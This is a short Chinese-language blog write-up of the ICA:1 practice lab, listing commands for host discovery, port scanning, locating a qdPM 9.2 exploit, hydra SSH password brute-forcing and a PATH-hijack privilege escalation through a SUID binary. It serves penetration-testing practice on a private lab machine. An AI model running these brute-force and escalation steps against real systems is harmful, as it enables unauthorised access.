ICA:1靶场

发布时间 2023-04-13 21:40:42作者: 灿灿灿灿灿

ICA:1靶场

机器信息:

靶机:192.168.142.129

攻击机:192.168.142.132

一、主机发现

arp-scan -l

或者

nmap -sP 192.168.142.0/24

二、端口扫描

nmap -sV -p- 192.168.142.129

或者

nmap -A -p- 192.168.142.129

三、渗透提权阶段

(1)查询框架漏洞:

searchsploit qdpm 9.2

(2)找到对应文件:

locate php/webapps/50176.txt

或者

find / -name 50176.txt

(3)通过50176.txt中的方法找到了数据库用户名和密码

(4)登录数据库查询用户信息

(5)用数据库拿到的信息进行ssh爆破

hydra -L user.txt -P password.txt ssh://192.168.142.129

(6)确定用户账号和密码,ssh进行登录

(7)得到提示,找查可执行文件

find / -perm -u=s 2>/dev/null

(8)通过strings查看文件中的字符

strings /opt/get_access

(9)发现存在setuid、system、cat /root/system.info等字眼

(10)修改环境变量来提权

vim /tmp/cat

echo "/bin/bash" > /tmp/cat

chmod +x /tmp/cat

export PATH=/tmp:$PATH

echo $PATH

(11)执行文件,成功提权

/opt/get_access

(12)提权后删除/tmp/cat文件

(13)到/root目录下拿到flag

参考资料:

https://www.cnblogs.com/sainet/p/15656589.html

https://juejin.cn/post/7067099039526813703